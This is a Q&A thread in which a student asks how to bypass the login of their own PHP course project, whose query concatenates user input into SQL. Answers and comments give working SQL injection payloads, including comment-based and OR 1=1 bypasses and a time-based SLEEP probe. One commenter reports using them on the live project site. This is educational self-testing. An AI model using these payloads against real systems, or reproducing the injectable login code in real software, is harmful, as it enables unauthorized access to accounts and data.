# How do I log in a web application with an invalid password by SQL injection attack?

Tags: php, mysql, sql-injection

I developed a web application in PHP as a course project. Now I am trying to perform a SQL injection attack on my website, but I don't quite get the idea. Let's say, I know a valid username and I am trying to log in with an invalid password. I guess I should type something like `1 or 10=10` into the password field on login page, but I am nowhere near success.

The code for handling user login is below:

```
<?php

require_once('repository_fns.php');
session_start();

if (($_POST['username']) && ($_POST['password'])) {
$username = $_POST['username'];
$password = $_POST['password'];
if(login($username, $password)) {
  $_SESSION['valid_user'] = $username;
}
else{
do_html_header_error_page();
do_error_message_cannot_login();
do_html_footer();
exit;
}
}

$current_user=$_SESSION['valid_user'];

do_html_header_member();
do_page_content_member($current_user);

do_html_footer();

?>
```

Login function:

```
function login($username, $password) {
   $conn = db_connect();
   $result = $conn->query("select * from user where username='".$username."'
   and password = sha1('".$password."')");
   if (!$result) {
   return false;
 }

 if ($result->num_rows>0) {
   return true;
 } else {
 return false;
 }
 }
```

So how should I actually perform the attack? Or is there any kind of SQL injection that this login feature is vulnerable to?

Comment: Can you show your member.php code?

Answer (score 1, accepted):

The idea is inject a piece of sql that will suppress password check part. The simplest way is to use comments "--":

```
$username = "known_username'--";
```

So query will be

```
select * from user where username='known_username'--' and password = sha1('anything')
```

The part after "--" is a comment, thus is ignored.

Comment: Well I still get no luck in getting any of the answers to work. I have no idea what was wrong. Would you mind trying it on this [link](http://lupersonallms.com/login.php)? This is my project :)

Comment: Oh and user10 is a valid username.

Comment: Something is wrong with your code. When I visit http://lupersonallms.com/member.php I see "You are logged in as .".

Comment: Yeah, I should fix that. Thank you, ksimka.

Answer (score 0):

if you put `1 or 10=10` as you password, your resulting query is

```
select * from user where username='".$username."' and password = sha1('1 or 10=10')
```

which doesn't get you anywhere.
Try this as Password: `') OR 1 = 1 --`

This will result in

```
select * from user where username='".$username."' and password = sha1('') OR 1 = 1 --')
```

The double dashes `--` will comment out everything afterwards, so you do not have an invalid query

Comment: I tried your answers but nothing seems to work :( Maybe there's something on the front end? I copied some front end code from Bootstrap examples, basically this page [link](http://getbootstrap.com/examples/signin/) Is there any validation on the password field?

Comment: I can't open your link. 

I would recommend you to start debugging your code by calling `var_dump($_POST)` to see if you actually recieve the correct values from the form. If you do, all of the answers would work.

Comment: It seems I am getting the correct input [screenshot](https://cloud.githubusercontent.com/assets/16259743/12752276/98cb79fa-c976-11e5-97a0-e7d2b3c4abc2.png). The correct password for user10 is 'password' and the login works.

Comment: Then try to figure out what the final query looks like (again with var_dump or similar)

Comment: I've just logined with login `user10` and password `') or 1=1#`. Also time-based `password')  AND (SELECT * FROM (SELECT(SLEEP(5)))t) and 1=1#` works.

Comment: That's great, ksimka! Thank you so much.

Answer (score 0):

Since you're inserting data without validating it you can include SQL syntax, for instance

```
' OR 1=1; #
```

This would result in your query looking like

```
select * from user where username='' OR 1=1 #'and password = sha1('".$password."')
```

What's after the *#* would be treated as a comment and as a result not parsed, turning this query into a one that fetches all the users.